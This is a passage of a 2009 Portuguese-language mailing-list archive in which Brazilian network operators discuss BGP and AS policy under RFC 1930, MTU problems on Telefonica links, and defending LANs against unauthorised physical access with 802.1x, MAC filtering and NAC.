Viu a palavra 'connected'? As pol?ticas de que fala essa RFC dizem respeito ao tr?fego entre ASs e n?o entre roteadores. Os an?ncios s?o entre ASs e n?o s? entre roteadores. A pol?tica tem que ser a mesma em todos os pontos onde dois ASs trocam figurinhas. Porisso o que voc? quer fazer est? violando a RFC 1930, tamb?m conhecida como BCP 6. > A realidade ? esta, a outra localidade ? bem menor e um /24 atende. N?o > justifica solicitar um AS para l?, mas tamb?m ela n?o tem conex?o com o > ponto principal. se voc? quer anunciar esse /24 (note que sou contra isso!) e ele n?o ? conexo com os outros blocos, o mais razo?vel ? ter outro n?mero de AS. pois se voc? tem pol?ticas diferentes nos dois pontos, de acordo com a BCP 6 tem que ter sistemas aut?nomos diferentes. > Na verdade nem interessa ter conex?o com o ponto principal, seria > interessante usar l? como redund?ncia f?sica, mas ? invi?vel montar um > link entre os 2 e um link virtual? isso n?o custa nada. > Mas e se for o mesmo provedor tanto l? quanto aqui? Tecnicamente, dentro > do backbone deles, eles saberiam direcionar a requisi??o para aquele IP > a partir da outra sess?o BGP? Eu creio que sim, mas da? que surgiu minha > d?vida! se for o mesmo provedor ele pode se achar no direito - e estar? certo em fazer isso - em rotear qualquer dos seus blocos por qualquer dos seus roteadores, uma vez que sendo do mesmo sistema aut?nomo, pela defini??o da BCP 6, por hip?tese eles saber?o se virar para passar o pacote de um para o outro lado. Note que uma rota BGP ? uma lista da ASs, n?o um prefixo + um IP de destino. From rayel at fertimitsui.com.br Mon Jun 15 09:20:59 2009 From: rayel at fertimitsui.com.br (Felipe Rayel) Date: Mon, 15 Jun 2009 09:20:59 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <4A35976A.5060608@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> Message-ID: <4A363CAB.6080908@fertimitsui.com.br> Ser? que alguem aqui est? tendo o mesmo problema que eu? Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem o teste com o telnet na porta 110 e ocorre o mesmo problema. O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O voip que ? via UDP funciona normalmente. J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes n?o detecta este problema, pois eles conseguem navegar normalmente. O problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser problema aqui, pois os demais clientes na BRtelecom, etc, n?o tem tido este problema. Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em 1350.. Curiosamente passou a funcionar tudo. Alguem sabe como posso solucionar isso ou tentar entrar em contato com a Telefonica? Visto que pelo 0800 n?o consegui. Segue um traceroute de um cliente at? o meu servidor 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms 211.082 ms 208.803 ms 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms 207.880 ms 208.880 ms 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 ms 210.797 ms 212.841 ms 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms 187.203 ms 193.537 ms 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) 183.577 ms 211.051 ms 182.280 ms 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) 178.779 ms 181.512 ms 179.809 ms 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 ms 308.261 ms 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms 201.248 ms From agapito at gmail.com Mon Jun 15 10:07:47 2009 From: agapito at gmail.com (Anderson Agapito) Date: Mon, 15 Jun 2009 10:07:47 -0300 Subject: [GTER] DNS ig.com.br via CTBC In-Reply-To: References: <4A32756F.3010400@netconsultoria.com.br> Message-ID: Srs, tivemos problema com um dos nossos Routers, que cabou afetando os participantes do PTT Terremark. O problema j? foi resolvido. atenciosamente, Agapito 2009/6/12 casfre at gmail.com : > 2009/6/12 Tobias P. Santos : > >> Possu?mos link CTBC e n?o conseguimos acessar os servidores DNS do IG >> (200.225.157.104 e 200.225.157.105). >> >> Mais algu?m encontrando problema semelhante? > > ? ?Ambos funcionando aqui, em duas redes diferentes, ambas IPs da CTBC. > > ? ?Obrigado. > > C?ssio > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From alsilvestri at gmail.com Mon Jun 15 19:44:11 2009 From: alsilvestri at gmail.com (Alex Silvestri) Date: Mon, 15 Jun 2009 19:44:11 -0300 Subject: [GTER] Problemas com Link Telefonica In-Reply-To: <4A36A080.5070105@conectcor.com.br> References: <4A36A080.5070105@conectcor.com.br> Message-ID: Welisson, Estou em Bauru/SP e nossos clientes com LP?s Telefonica est?o normais, apenas traf?go lento para alguns destinos, mas online. []?s Alex 2009/6/15 Welisson > Boa tarde a todos, > > Algu?m est? com dificuldades ou sem acesso com link telefonica ou > telefonia, no interior do estado SP. mas precisamente na regi?o de Bauru. > > Att. > > Welisson Tom? > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From carlos at unesp.br Mon Jun 15 16:40:22 2009 From: carlos at unesp.br (Carlos Coletti) Date: Mon, 15 Jun 2009 16:40:22 -0300 Subject: [GTER] Problemas com Link Telefonica In-Reply-To: <4A36A080.5070105@conectcor.com.br> References: <4A36A080.5070105@conectcor.com.br> Message-ID: <1245094822.9435.17.camel@legolas> Estamos tamb?m! 3 Links parados e mais alguns intermitentes. Parece que est?o com problemas na regi?o!! - Carlos Coletti UNESP - Assessoria de Inform?tica Em Seg, 2009-06-15 ?s 16:26 -0300, Welisson escreveu: > Boa tarde a todos, > > Algu?m est? com dificuldades ou sem acesso com link telefonica ou > telefonia, no interior do estado SP. mas precisamente na regi?o de Bauru. > > Att. > > Welisson Tom? > -- > gter list https://eng.registro.br/mailman/listinfo/gter From eduardo.andrez at gmail.com Sun Jun 14 23:52:37 2009 From: eduardo.andrez at gmail.com (Andrez) Date: Sun, 14 Jun 2009 23:52:37 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <4A35976A.5060608@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> Message-ID: <1c499e9d0906141952o6f018976wc3f1802b07f7c5c2@mail.gmail.com> Julio, > > Aqui em casa nao e' o caso, ele mostra tambem as rotas via ospf, aprendidas > de um dos openwrt, coisa de doido nao ? > De fato o o proto mostra...... quem configurou a rota ( digamos assim ). N?o importa qual protocolo do zebra configurou isso. Foi o zebra. Se fossa est?tica apareceria ai do mesmo jeito. -- Atenciosamente. Eduardo Andrez de Oliveira. From cleber-listas at inetweb.com.br Mon Jun 15 16:10:05 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Mon, 15 Jun 2009 16:10:05 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__seguran=E7a_de_acesso_fisico_na_red?= =?iso-8859-1?q?e?= In-Reply-To: <4A3698F5.9090804@onda.psi.br> References: <4A3698F5.9090804@onda.psi.br> Message-ID: Oi Alexandre, Voce pode configurar no DHCP para ter sempre o mesmo IP para um determinado MAC e outros MAC n?o cadastrados n?o terem nenhum IP. Se n?o me engano, pelo switch ? possivel ter uma restri??o de porta x MAC, por?m, ser? uma grande m?o de obra ao cliente. Li isso em manual de switch 3com mas nunca apliquei. Outra solu??o tamb?m ? ele ter uma boa politica de senhas/acessos via AD ou outros para permitir acessos ? shares, proxy, etc, somente com autentica??o. Abra?os -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre J. Correa - Onda Internet Enviada em: segunda-feira, 15 de junho de 2009 15:55 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] seguran?a de acesso fisico na rede Boa tarde !! Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me explicou a seguinte situa??o: - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp na rede onde atribui ips automaticamente... esta maquina vai ficar fora do DOMINIO da rede sem acesso a documentos etc etc.. a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar nada, mesmo a pessoa colocando um ip manualmente... para este caso sugeri autentica??o via 802.1x de todas as esta??es, incluindo o switch fazer a autentica??o em um servidor central de chaves usando radius... existem outras possibilidades ? uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar quais macs podem conectar fisicamente naquelas portas ? resumindo, ele precisa permitir conexao fisica somente a maquinas autorizadas .. alguem conhece alguma solu??o ? obrigado !! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 READY ! -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.70/2177 - Data de Lan?amento: 06/15/09 05:54:00 From emota at emota.com.br Mon Jun 15 16:22:05 2009 From: emota at emota.com.br (Eduardo Mota) Date: Mon, 15 Jun 2009 16:22:05 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: References: <4A3698F5.9090804@onda.psi.br> Message-ID: <4A369F5D.6070409@emota.com.br> Meu voto vai pra VLAN. Edinilson - ATINET escreveu: > Pode se ADICIONAR, aos itens que ja mencionou: > 1o) VLANs; > 2o) Dependendo do SO, desligar o arp dos servidores/estacoes (sendo que, > neste caso, devera trabalhar com mac estatico, o que ? bem trabalhoso numa > rede local). > > Sao somente sugestoes... > > Edinilson > --------------------------------------------------------- > ATINET-Professional Web Hosting > Tel Voz: (0xx11) 4412-0876 > http://www.atinet.com.br > > > ----- Original Message ----- > From: "Alexandre J. Correa - Onda Internet" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Monday, June 15, 2009 3:54 PM > Subject: [GTER] seguran?a de acesso fisico na rede > > > Boa tarde !! > > Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele > me explicou a seguinte situa??o: > > - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um > dhcp na rede onde atribui ips automaticamente... esta maquina vai ficar > fora do DOMINIO da rede sem acesso a documentos etc etc.. > > a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma > acessar nada, mesmo a pessoa colocando um ip manualmente... > > para este caso sugeri autentica??o via 802.1x de todas as esta??es, > incluindo o switch fazer a autentica??o em um servidor central de chaves > usando radius... > > existem outras possibilidades ? > > uma outra solu??o que ele me questionou foi: Existe uma maneira de > filtrar quais macs podem conectar fisicamente naquelas portas ? > > resumindo, ele precisa permitir conexao fisica somente a maquinas > autorizadas .. alguem conhece alguma solu??o ? > > > obrigado !! > > From gilberto.nunes at selbetti.com.br Mon Jun 15 16:21:24 2009 From: gilberto.nunes at selbetti.com.br (Gilberto Nunes) Date: Mon, 15 Jun 2009 16:21:24 -0300 Subject: [GTER] =?iso-8859-1?q?Mensura=E7=E3o_da_Rede?= Message-ID: <1245093684.4865.4.camel@giba-ti.selbetti.local> Boa tarde Pessoal da Lista Por gentileza Senhores Estou procurando por ferramentas que possa me mostrar a medi??o de performance de rede entre hosts e entre estes e a Rede Interna/Externa Obrigado Gilberto Nunes Ferreira TI Selbetti Gest?o de Documentos Telefone: +55 (47) 3441-6004 Celular: +55 (47) 8861-6672 From itamar at ispbrasil.com.br Mon Jun 15 15:58:53 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Mon, 15 Jun 2009 15:58:53 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: <4A3698F5.9090804@onda.psi.br> References: <4A3698F5.9090804@onda.psi.br> Message-ID: basicamente e' isto. aconselho tamb?m que ele troque todos os seus switch's por swiches gerenciaveis 2009/6/15 Alexandre J. Correa - Onda Internet : > Boa tarde !! > > Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me > explicou a seguinte situa??o: > > - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp > na rede onde atribui ips automaticamente... esta maquina vai ficar fora do > DOMINIO da rede sem acesso a documentos etc etc.. > > a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar > nada, mesmo a pessoa colocando um ip manualmente... > > para este caso sugeri autentica??o via 802.1x de todas as esta??es, > incluindo o switch fazer a autentica??o em um servidor central de chaves > usando radius... > > existem outras possibilidades ? > > uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar > quais macs podem conectar fisicamente naquelas portas ? > > resumindo, ele precisa permitir conexao fisica somente a maquinas > autorizadas .. alguem conhece alguma solu??o ? > > > obrigado !! > > -- > Sds. > > Alexandre Jeronimo Correa > > Onda Internet > www.onda.net.br > IPV6 READY ! > > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From matheuscucoloto at gmail.com Mon Jun 15 18:13:10 2009 From: matheuscucoloto at gmail.com (Matheus Cucoloto) Date: Mon, 15 Jun 2009 18:13:10 -0300 Subject: [GTER] RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: Renato, funciona sim n?o tem o porque de n?o funcionar. Eu mesmo tenho duas sess?es com a mesma operadora mas em links de Internet diferentes. Na sess?o BGP a unica diferen?a ? que fa?o anuncios diferentes. Pode ser que a operadora n?o esta querendo fazer porque os seus dois links vao fazer sess?o no mesmo router. Ai talvez alguma coisa pode dar errado ou impossibiliteo projeto. ? o que eu imagino. Porem ja levantei duas sess?es BGP com a BRT em dois links de Internet Diferente mas com o Mesmo AS e o mesmo NEIGHBOR e funcionou sim. Abra?os. 2009/6/15 Renato Frederick : > >> note o conceito de sistema aut?nomo. ele deve ser capaz de receber >> QUALQUER pacote para o AS inteiro e rote?-lo internamente. A? vale o >> que >> eu disse acima. De qualquer forma como o operador n?o sabe se voc? ? ou >> n?o topologicamente conexo, ele pode sim estabelecer outra sess?o com o >> mesmo AS. Mas lembre-se de que as rotas BGP s?o para sistemas >> aut?nomos, >> ent?o, repetindo, se o site A n?o souber rotear para o site B, a chance >> de >> dar besteira ? bem grande. >> > Entao Danton, acontece que eles n?o comunicam entre si n?o. > > A realidade ? esta, a outra localidade ? bem menor e um /24 atende. N?o justifica solicitar um AS para l?, mas tamb?m ela n?o tem conex?o com o ponto principal. > Na verdade nem interessa ter conex?o com o ponto principal, seria interessante usar l? como redund?ncia f?sica, mas ? invi?vel montar um link entre os 2 > Ent?o pensei que se eu divulgasse uma rede /24 somente l?(mais uma vez, estou dando exemplo /24, pode ser /23, ainda n?o cheguei a um consenso), e no site principal todas as redes menos esta, funcionaria, j? que para a Internet eu teria um /24 chegando a partir do AS que atende o provedor l? e o restante das redes chegando a partir do AS dos outros provedores que atendem aqui. > > Mas e se for o mesmo provedor tanto l? quanto aqui? Tecnicamente, dentro do backbone deles, eles saberiam direcionar a requisi??o para aquele IP a partir da outra sess?o BGP? Eu creio que sim, mas da? que surgiu minha d?vida! > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Matheus Cucoloto System Admin. Net Admin. From mayk.campelo at gmail.com Mon Jun 15 17:08:28 2009 From: mayk.campelo at gmail.com (Mayk Campelo) Date: Mon, 15 Jun 2009 17:08:28 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: <20090615190717.GT1741@pangeia.com.br> References: <4A3698F5.9090804@onda.psi.br> <20090615190717.GT1741@pangeia.com.br> Message-ID: <2f3f2f700906151308m51255c1fn3f3360a7c91c339f@mail.gmail.com> Um switch de borda com suporte a logon pode ser ?til, autenticando com 802.1X ou EAPoL ( EAP over LAN). Cy-a -- Mayk Campelo 2009/6/15 Nelson Murilo : > On Mon, Jun 15, 2009 at 03:54:45PM -0300, Alexandre J. Correa - Onda Internet wrote: >> uma outra solu??o que ele me questionou foi: Existe uma maneira de >> filtrar quais macs podem conectar fisicamente naquelas portas ? > > Certamente que pode. Mas um atacante tambem pode forjar o mac de > uma maquina autorizada. > > ./nelson -murilo -url http://ysts.org > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From rosauro at rline.com.br Mon Jun 15 20:53:50 2009 From: rosauro at rline.com.br (Rosauro - RLINE) Date: Mon, 15 Jun 2009 20:53:50 -0300 Subject: [GTER] RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: <4A36DF0E.2090809@rline.com.br> Danton, aproveitando o gancho, eu talvez at? teria uma situa??o parecida com essa, mas para anunciar um bloco /22. voc? comentou que um link virtual n?o custa nada. mas numa situa??o desta qdo o trafego fosse roteado para o ponto "errado" teria de voltar por este tunel, ai no caso nao estaria consumindo o dobro de banda do circuito ? Atenciosamente, Rosauro Baretta Danton Nunes escreveu: > On Mon, 15 Jun 2009, Renato Frederick wrote: > >> Entao Danton, acontece que eles n?o comunicam entre si n?o. > > ent?o d? um jeito de comunicar, p.ex. t?nel. se eles n?o formam um > todo conexo n?o deveriam ficar no mesmo AS. Pela defini??o da RFC1930: > > An AS is a connected group of one or more IP prefixes run by one > or more network operators which has a SINGLE and CLEARLY DEFINED > routing policy. > > Viu a palavra 'connected'? As pol?ticas de que fala essa RFC dizem > respeito ao tr?fego entre ASs e n?o entre roteadores. Os an?ncios s?o > entre ASs e n?o s? entre roteadores. A pol?tica tem que ser a mesma em > todos os pontos onde dois ASs trocam figurinhas. Porisso o que voc? > quer fazer est? violando a RFC 1930, tamb?m conhecida como BCP 6. > >> A realidade ? esta, a outra localidade ? bem menor e um /24 atende. >> N?o justifica solicitar um AS para l?, mas tamb?m ela n?o tem conex?o >> com o ponto principal. > > se voc? quer anunciar esse /24 (note que sou contra isso!) e ele n?o ? > conexo com os outros blocos, o mais razo?vel ? ter outro n?mero de AS. > pois se voc? tem pol?ticas diferentes nos dois pontos, de acordo com a > BCP 6 tem que ter sistemas aut?nomos diferentes. > >> Na verdade nem interessa ter conex?o com o ponto principal, seria >> interessante usar l? como redund?ncia f?sica, mas ? invi?vel montar >> um link entre os 2 > > e um link virtual? isso n?o custa nada. > >> Mas e se for o mesmo provedor tanto l? quanto aqui? Tecnicamente, >> dentro do backbone deles, eles saberiam direcionar a requisi??o para >> aquele IP a partir da outra sess?o BGP? Eu creio que sim, mas da? que >> surgiu minha d?vida! > > se for o mesmo provedor ele pode se achar no direito - e estar? certo > em fazer isso - em rotear qualquer dos seus blocos por qualquer dos > seus roteadores, uma vez que sendo do mesmo sistema aut?nomo, pela > defini??o da BCP 6, por hip?tese eles saber?o se virar para passar o > pacote de um para o outro lado. Note que uma rota BGP ? uma lista da > ASs, n?o um prefixo + um IP de destino. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From victor_volpe at bol.com.br Mon Jun 15 16:43:54 2009 From: victor_volpe at bol.com.br (Victor) Date: Mon, 15 Jun 2009 16:43:54 -0300 Subject: [GTER] Problemas com Link Telefonica References: <4A36A080.5070105@conectcor.com.br> Message-ID: Ol?, Perdi a rota para diversos estados, dentre eles os mais afetados ? o norte e nordeste do pa?s. Ta come?ando a ficar complicado esses problemas constantes da telef?nica. Att. Victor ----- Original Message ----- From: Welisson To: gter at eng.registro.br Sent: Monday, June 15, 2009 4:26 PM Subject: [GTER] Problemas com Link Telefonica Boa tarde a todos, Algu?m est? com dificuldades ou sem acesso com link telefonica ou telefonia, no interior do estado SP. mas precisamente na regi?o de Bauru. Att. Welisson Tom? -- gter list https://eng.registro.br/mailman/listinfo/gter __________ NOD32 4156 (20090615) Information __________ This message was checked by NOD32 antivirus system. http://www.eset.com From wagner.elias at gmail.com Mon Jun 15 23:05:50 2009 From: wagner.elias at gmail.com (Wagner Elias) Date: Mon, 15 Jun 2009 23:05:50 -0300 Subject: [GTER] =?utf-8?q?seguran=C3=A7a_de_acesso_fisico_na_rede?= In-Reply-To: <4A3698F5.9090804@onda.psi.br> References: <4A3698F5.9090804@onda.psi.br> Message-ID: Alexandre, com a ado??o do 802.1x voc? teria um controle de acesso a rede, incluindo a conex?o "f?sica", pois uma m?quina conectada, mesmo com MAC Address Spoofado de uma m?quina autorizada, n?o conseguiria se autenticar na rede e ter conectividade com os outros ativos de rede. Se voc? necessita de mais controles, estude as solu??es de "Policies Checking" como NAC[1] e NAP[2]. Uma op??o open source para implementar policie checking ? o PacketFence[3]. 1 - http://www.cisco.com/en/US/netsol/ns466/networking_solutions_package.html 2 - http://technet.microsoft.com/en-us/network/bb545879.aspx 3 - http://www.packetfence.org/en/home.html Abs. -- Wagner Elias - OWASP Leader Project Brazil ------------------------------------------------------------------ Twitter: www.twitter.com/welias Blog: http://wagnerelias.com Profile: http://www.linkedin.com/in/wagnerelias 2009/6/15 Alexandre J. Correa - Onda Internet : > Boa tarde !! > > Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me > explicou a seguinte situa??o: > > - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp > na rede onde atribui ips automaticamente... esta maquina vai ficar fora do > DOMINIO da rede sem acesso a documentos etc etc.. > > a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar > nada, mesmo a pessoa colocando um ip manualmente... > > para este caso sugeri autentica??o via 802.1x de todas as esta??es, > incluindo o switch fazer a autentica??o em um servidor central de chaves > usando radius... > > existem outras possibilidades ? > > uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar > quais macs podem conectar fisicamente naquelas portas ? > > resumindo, ele precisa permitir conexao fisica somente a maquinas > autorizadas .. alguem conhece alguma solu??o ? > > > obrigado !! > > -- > Sds. > > Alexandre Jeronimo Correa > > Onda Internet > www.onda.net.br > IPV6 READY ! > > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From alexandre at onda.psi.br Mon Jun 15 23:57:31 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Mon, 15 Jun 2009 23:57:31 -0300 Subject: [GTER] =?utf-8?q?Mensura=C3=A7=C3=A3o_da_Rede?= In-Reply-To: <1245093684.4865.4.camel@giba-ti.selbetti.local> References: <1245093684.4865.4.camel@giba-ti.selbetti.local> Message-ID: <4A370A1B.6060002@onda.psi.br> www.mikrotik.com tem o bandwidth test .. muito bom para testar troughput de rede... roda em windows.. basta rodar o software nas 2 pontas e testar :) Gilberto Nunes wrote: > Boa tarde > > Pessoal da Lista > Por gentileza Senhores > > Estou procurando por ferramentas que possa me mostrar a medi??o de > performance de rede entre hosts e entre estes e a Rede Interna/Externa > Obrigado > > Gilberto Nunes Ferreira > TI > Selbetti Gest?o de Documentos > Telefone: +55 (47) 3441-6004 > Celular: +55 (47) 8861-6672 > > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From alexandre at onda.psi.br Tue Jun 16 00:01:49 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Tue, 16 Jun 2009 00:01:49 -0300 Subject: [GTER] =?utf-8?q?seguran=C3=A7a_de_acesso_fisico_na_rede?= In-Reply-To: References: <4A3698F5.9090804@onda.psi.br> Message-ID: <4A370B1D.9090902@onda.psi.br> Obrigado pelas sugestoes pessoal !! este cliente comentou sobre NAP, ja que a rede ? 99.9% windows .. (xp e vista), os switches sao todos gerenciaveis da dell modelo 6024 e 6048 .. nao me recordo os modelos.. mas vi aqui que eles suportam dot1x .. vou dar uma lida no material !! grande abra?o !! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! Wagner Elias wrote: > Alexandre, > > com a ado??o do 802.1x voc? teria um controle de acesso a rede, > incluindo a conex?o "f?sica", pois uma m?quina conectada, mesmo com > MAC Address Spoofado de uma m?quina autorizada, n?o conseguiria se > autenticar na rede e ter conectividade com os outros ativos de rede. > > Se voc? necessita de mais controles, estude as solu??es de "Policies > Checking" como NAC[1] e NAP[2]. Uma op??o open source para implementar > policie checking ? o PacketFence[3]. > > 1 - http://www.cisco.com/en/US/netsol/ns466/networking_solutions_package.html > 2 - http://technet.microsoft.com/en-us/network/bb545879.aspx > 3 - http://www.packetfence.org/en/home.html > > Abs. > From keffer666 at gmail.com Tue Jun 16 00:03:59 2009 From: keffer666 at gmail.com (Leandro Keffer) Date: Tue, 16 Jun 2009 00:03:59 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <4A363CAB.6080908@fertimitsui.com.br> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> Message-ID: Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no link telefonica, a qual alega nao ter nenhuma problema O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, tentarei em um horario idle da empresa para muar o mtu e fazer o teste com o ip anterior que ocorria o problema 2009/6/15 Felipe Rayel > > Ser? que alguem aqui est? tendo o mesmo problema que eu? > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail > ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e > trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem o > teste com o telnet na porta 110 e ocorre o mesmo problema. > > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O voip > que ? via UDP funciona normalmente. > > J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes > n?o detecta este problema, pois eles conseguem navegar normalmente. O > problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser > problema aqui, pois os demais clientes na BRtelecom, etc, n?o tem tido este > problema. > > Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em > 1350.. Curiosamente passou a funcionar tudo. > > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a > Telefonica? Visto que pelo 0800 n?o consegui. > > Segue um traceroute de um cliente at? o meu servidor > > 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms > 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms > 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * > 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms > 211.082 ms 208.803 ms > 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms > 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms > 207.880 ms 208.880 ms > 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 ms > 210.797 ms 212.841 ms > 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms > 187.203 ms 193.537 ms > 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) > 183.577 ms 211.051 ms 182.280 ms > 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) > 178.779 ms 181.512 ms 179.809 ms > 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 ms > 308.261 ms > 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms 201.248 > ms > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From diogo.montagner at gmail.com Tue Jun 16 08:22:44 2009 From: diogo.montagner at gmail.com (Diogo Montagner) Date: Tue, 16 Jun 2009 08:22:44 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> Message-ID: <84eb7a820906160422r13684d77jd8c65dc14ed57331@mail.gmail.com> Certa vez eu tive que baixar a mtu de um windows vista que estava utilizando um discador pppoe para poder acessar sites como hotmail e aplica??es como MSN. O engra?ado que isto somente acontecia com o Windows Vista. Como o uso do Vista era tempor?rio, nunca investiguei a fundo o porqu? disso estar acontecendo. Mas o link abaixo mostra que o problema n?o era (ou ?) novo. http://www.asterisko.com.br/vista-speedy-e-mtu/ []s ./diogo -montagner 2009/6/16 Leandro Keffer > Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no > link telefonica, a qual alega nao ter nenhuma problema > O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, > mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, > tentarei em um horario idle da empresa para muar o mtu e fazer o teste com > o > ip anterior que ocorria o problema > > > 2009/6/15 Felipe Rayel > > > > > Ser? que alguem aqui est? tendo o mesmo problema que eu? > > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail > > ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e > > trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem > o > > teste com o telnet na porta 110 e ocorre o mesmo problema. > > > > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O > voip > > que ? via UDP funciona normalmente. > > > > J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes > > n?o detecta este problema, pois eles conseguem navegar normalmente. O > > problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser > > problema aqui, pois os demais clientes na BRtelecom, etc, n?o tem tido > este > > problema. > > > > Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em > > 1350.. Curiosamente passou a funcionar tudo. > > > > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a > > Telefonica? Visto que pelo 0800 